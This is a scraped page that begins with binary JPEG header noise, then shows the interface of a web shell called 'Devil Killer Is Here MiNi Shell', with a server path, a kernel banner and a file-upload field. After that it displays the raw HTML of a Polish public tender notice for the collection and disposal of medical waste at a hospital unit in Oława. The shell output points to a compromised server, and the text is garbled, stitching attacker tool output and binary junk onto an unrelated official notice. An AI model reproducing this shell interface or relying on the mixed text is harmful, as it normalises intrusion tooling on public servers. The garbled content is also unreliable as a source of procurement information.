JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251209/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251209/0058573001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wywóz i unieszkodliwianie odpadów medycznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Opieki Zdrowotnej w Oławie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000306816</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ul. K. K. Baczyńskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zozolawa.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zozolawa.wroc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wywóz i unieszkodliwianie odpadów medycznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3f04a59a-830e-4316-a50f-ae7bb15a0335</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00585730</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00196785/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Wywóz i unieszkodliwianie odpadów medycznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3f04a59a-830e-4316-a50f-ae7bb15a0335 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-3f04a59a-830e-4316-a50f-ae7bb15a0335</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozdz. X. SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zg. z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOZ/DZP/PN/26/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem niniejszego zamówienia jest świadczenie usługi transportu (wraz z załadunkiem i rozładunkiem) odpadów medycznych wytwarzanych w Zespole Opieki zdrowotnej, ul. Baczyńskiego 1, 55-200 Oława oraz unieszkodliwianie odpadów medycznych w zakładzie utylizacji zlokalizowanym na obszarze województwa, na którym odpady zostały wytworzone lub w miejscu położonym najbliżej miejsca ich wytwarzania. Dopuszcza się unieszkodliwianie odpadów medycznych na obszarze województwa innego niż to, na terenie którego zostały wytworzone lub w najbliżej położonej instalacji w przypadku braku instalacji do unieszkodliwiania tych odpadów na obszarze danego województwa lub gdy instalacje nie mają wolnych mocy przerobowych zgodnie z art. 20 ustawy o odpadach. <br/>2. Zamówienie obejmuje swoim zakresem 1 zadanie<br/><br/>A. Szczegółowy zakres zamówienia <br/>a) Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi odbioru, transportu i unieszkodliwiania niebezpiecznych odpadów medycznych powstających z działalności medycznej wykonywanej w siedzibie Zamawiającego oraz związanych z nią badań, które zgodnie z Rozporządzenie Ministra Środowiska z dnia 2.01.2020r w sprawie katalogu odpadów (Dz.U. 2020 poz. 10 z poźn. zm.), zostały zakwalifikowane do grupy: 18 01 02, 18 01 03, 180104, 18 01 06, 18 01 08, 18 01 09<br/><br/>B. Do obowiązków Wykonawcy należy:<br/>a) zachowanie ciągłości odbioru i unieszkodliwianie przekazanych niebezpiecznych odpadów medycznych tak, aby nie stanowiły one zagrożenia sanitarno – epidemiologicznego, metodą i w miejscu wskazanym przez Wykonawcę w sposób zapewniający zgodność z przepisami prawa powszechnie obowiązującego. <br/>b) ponoszenia odpowiedzialności za właściwą i terminową realizację usługi odbioru, transportu i unieszkodliwiania niebezpiecznych odpadów medycznych, <br/>c) ponoszenia odpowiedzialności za realizację usługi odbioru, transportu i unieszkodliwiania niebezpiecznych odpadów medycznych wobec organów kontroli zewnętrznych,<br/>d) przejęcie odpadów i ponoszenie odpowiedzialności za realizację niniejszej usługi na podstawie art. 27 ustawy o odpadach oraz za dalsze gospodarowanie nimi wobec organów kontroli zewnętrznych,<br/>e) unieszkodliwianie zakaźnych odpadów medycznych w sposób przewidziany w art. 95 ustawy o odpadach przez termiczne przekształcanie w spalarniach odpadów niebezpiecznych w ostatecznym procesie unieszkodliwiania D10 – Przekształcanie termiczne na lądzie,<br/>f) Wykonawca odbierze odpady własnym transportem z siedziby Zamawiającego, trzy razy w tygodniu – w poniedziałek, środę i w piątek.<br/>W przypadku kumulacji dni wolnych w tym niedziel i świąt wykonawca winien zorganizować odbiór odpadów tak, aby magazynowanie odpadów w siedzibie zamawiającego nie przekroczyło czasu: <br/>•	18 01 02; 18 01 03, 18 01 06, 18 01 08– czas przechowywania nie może przekroczyć 72 godzin,<br/>•	18 01 04, 18 01 09 mogą być magazynowane tak długo, jak pozwalają na to ich właściwości, jednak nie dłużej niż do 30 dni, <br/>g) Wykonawca jest zobowiązany do ważenia odpadów własnym, legalizowanym sprzętem w chwili ich odbioru oraz każdorazowo potwierdzić odbiór poprzez potwierdzenie ich przejęcia w rejestrze BDO.<br/>h) W chwili załadunku niebezpiecznych odpadów medycznych na środek transportu Wykonawcy, odpady stają się jego własnością i ponosi on odpowiedzialność za ich transport i unieszkodliwienie.<br/>i) Środek transportu Wykonawcy powinien odpowiadać wymogom dla przechowywania i transportowania odpadów niebezpiecznych, z zachowaniem przepisów ustawy o przewozie towarów niebezpiecznych. <br/>Środki transportu muszą być oznakowane zgodnie z obowiązującymi przepisami.<br/>j) W przypadku wygaśnięcia zezwolenia na transport, zbieranie (jeśli wymagane) i unieszkodliwianie odpadów Wykonawca zobowiązany jest niezwłocznie przedłożyć Zamawiającemu nowe zezwolenie, pod rygorem odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.<br/><br/>C. Do obowiązków Zamawiającego należy:<br/> a) pakowanie i składowanie niebezpiecznych odpadów medycznych przez Zamawiającego w specjalnych, posiadających atest workach, zgodnie z obowiązującymi przepisami. Przedmioty ostre takie jak igły i skalpele muszą być zbierane do opakowań zabezpieczających przed ich wydostaniem i uszkodzeniem zewnętrznego worka. <br/> b) właściwy sposób gromadzenia odpadów do momentu przekazania ich Wykonawcy.<br/><br/>D. Postanowienia ogólne:<br/>a) Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/>b) Wykonawca zobowiązuje się w przypadku awarii lub innych zdarzeń losowych, których nie był w stanie przewidzieć, do:<br/>- bezzwłocznego powiadomienia Zamawiającego o zaistniałych trudnościach w zakresie terminowego wykonania usługi,<br/>- zabezpieczenia przez innego Podwykonawcę wykonania usługi, na koszt Wykonawcy, za zgodą Zamawiającego <br/>c) W przypadku zwiększonej ilości dni wolnych od pracy, strony mogą uzgodnić termin wykonania usługi, celem zapewnienia ciągłości świadczonych usług.<br/>d) Wykonawca określi numery telefonów kontaktowych i numery fax. niezbędne dla sprawnego wykonania zamówienia<br/>e) W przypadku wygaśnięcia zezwolenia na transportu i unieszkodliwianie odpadów Wykonawca zobowiązany jest niezwłocznie przedłożyć Zamawiającemu nowe zezwolenie, pod rygorem odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.<br/>f) W chwili załadunku przedmiotu zamówienia na środek transportu Wykonawcy odpady stają się jego własnością i ponosi on odpowiedzialność za ich transport i unieszkodliwienie. <br/><br/>3. Usługa powinna być wykonywana zgodnie z przepisami:<br/>a) )Ustawa z dnia 14.12.2012r. o odpadach – (Dz.U z 2023r., poz. 1587 z póz. zm.),<br/>b) Ustawą z dnia: 27.04.2001r. Prawo Ochrony Środowiska – tekst jednolity (Dz.U. 2022r. poz. 2556 z późn. zm.), <br/>c) Rozporządzeniem Ministra Zdrowia z dnia 5.10.2017 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz.U. z 2017r. poz. 1975),<br/>d) Ustawa z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz.U. z 2022r. poz. 2147 z późn. zm.),<br/>e) Rozporządzenie Ministra Środowiska z dnia 13.01.2014r. w sprawie dokumentu potwierdzającego unieszkodliwianie zakaźnych odpadów medycznych lub zakaźnych odpadów weterynaryjnych (Dz.U. 2014r. poz. 107),<br/>f) Rozporządzenie Ministra Środowiska z dnia 2.01.2020 r w sprawie katalogu odpadów (Dz.U. 2020 poz. 10 z poźn. zm.),<br/>g) Ustawa z dnia 13.09.1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. 2023r. poz.1469),<br/>h) Rozporządzenie Ministra Zdrowia z dnia 7.12.2001r. w sprawie postępowania ze zwłokami i szczątkami ludzkimi (Dz.U. 2021r. poz. 1910 z późn. zm.),<br/>i) inne ustawy, rozporządzenia i normy obowiązujące w tym zakresie.<br/><br/>4. Ilości, charakterystykę oraz parametry techniczno-użytkowe przedmiotu zamówienia określono w specyfikacji asortymentowo-cenowej stanowiących załączniki nr 9 oraz Załącznikach nr 1 i 5 do specyfikacji istotnych warunków zamówienia (SWZ). <br/>5. Ilości zawarte w załączniku Nr 9 są ilościami orientacyjnymi. Zamawiający będzie przekazywał wykonawcy na bieżąco odpady, które zostaną przez niego wytworzone. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90520000-8 - Usługi w zakresie odpadów radioaktywnych, toksycznych, medycznych i niebezpiecznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość do spalarni</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej Zamawiający żąda przedłożenia: <br/>•	aktualnego zezwolenia na prowadzenie działalności gospodarowania odpadami medycznymi w zakresie zbierania (dla podmiotów, które są do tego zobowiązane) oraz unieszkodliwiania wszystkich odpadów będących przedmiotem zamówienia zgodnie z ustawą o odpadach (Dz.U z 2023r., poz. 1587 z póz. zm.) i ustawą Prawo ochrony środowiska (Dz.U. 2022r. poz. 2556 z późn. zm.), <br/>•	aktualny wpis w Bazie Danych o Produktach i Opakowaniach oraz o Gospodarce Odpadami (rejestr BDO) w zakresie transportu odpadów określonych w OPZ - dla podmiotu transportującego odpady;<br/>•	wpisu do rejestru, o którym mowa w art. 49 ustawy o odpadach (Dz.U z 2023r., poz. 1587 z póz. zm.).<br/>6. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda złożenia wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami, w zakresie:<br/>•	dysponowania specjalistycznymi środkami transportu do utylizacji odpadów medycznych poprzez złożenie oświadczenie o posiadaniu, co najmniej dwóch pojazdów spełniających wymagania, o których mowa w ustawie z dnia 19.08.2011r, Dz. U 2022r., poz. 2147 o przewozie towarów niebezpiecznych - należy złożyć oświadczenie zgodne ze wzorem Załącznik nr 6 do SWZ<br/>7. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda złożenia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności wykazanie<br/>dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia poprzez złożenie oświadczenia potwierdzającego posiadanie kwalifikacji zawodowych t.j. ważnych zaświadczeń ADR – o ukończeniu kursu dla osób przewożących towary niebezpieczne zgodnie z art. 20 Ustawy z dnia 19 sierpnia 2011 o przewozie towarów niebezpiecznych (Dz. U. z 2022 r. poz. 2147) dla min. dwóch kierowców - należy złożyć oświadczenie zgodne ze wzorem załącznika nr 8 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 10 do SWZ;<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej Zamawiający żąda przedłożenia: <br/>•	aktualnego zezwolenia na prowadzenie działalności gospodarowania odpadami medycznymi w zakresie zbierania (dla podmiotów, które są do tego zobowiązane) oraz unieszkodliwiania wszystkich odpadów będących przedmiotem zamówienia zgodnie z ustawą o odpadach (Dz.U z 2023r., poz. 1587 z póz. zm.) i ustawą Prawo ochrony środowiska (Dz.U. 2022r. poz. 2556 z późn. zm.), <br/>•	aktualny wpis w Bazie Danych o Produktach i Opakowaniach oraz o Gospodarce Odpadami (rejestr BDO) w zakresie transportu odpadów określonych w OPZ - dla podmiotu transportującego odpady;<br/>•	wpisu do rejestru, o którym mowa w art. 49 ustawy o odpadach (Dz.U z 2023r., poz. 1587 z póz. zm.).<br/>6. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda złożenia wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami, w zakresie:<br/>•	dysponowania specjalistycznymi środkami transportu do utylizacji odpadów medycznych poprzez złożenie oświadczenie o posiadaniu, co najmniej dwóch pojazdów spełniających wymagania, o których mowa w ustawie z dnia 19.08.2011r, Dz. U 2022r., poz. 2147 o przewozie towarów niebezpiecznych - należy złożyć oświadczenie zgodne ze wzorem Załącznik nr 6 do SWZ<br/>7. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda złożenia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności wykazanie<br/>dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia poprzez złożenie oświadczenia potwierdzającego posiadanie kwalifikacji zawodowych t.j. ważnych zaświadczeń ADR – o ukończeniu kursu dla osób przewożących towary niebezpieczne zgodnie z art. 20 Ustawy z dnia 19 sierpnia 2011 o przewozie towarów niebezpiecznych (Dz. U. z 2022 r. poz. 2147) dla min. dwóch kierowców - należy złożyć oświadczenie zgodne ze wzorem załącznika nr 8 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z Załącznikiem nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-3f04a59a-830e-4316-a50f-ae7bb15a0335</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-17 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: 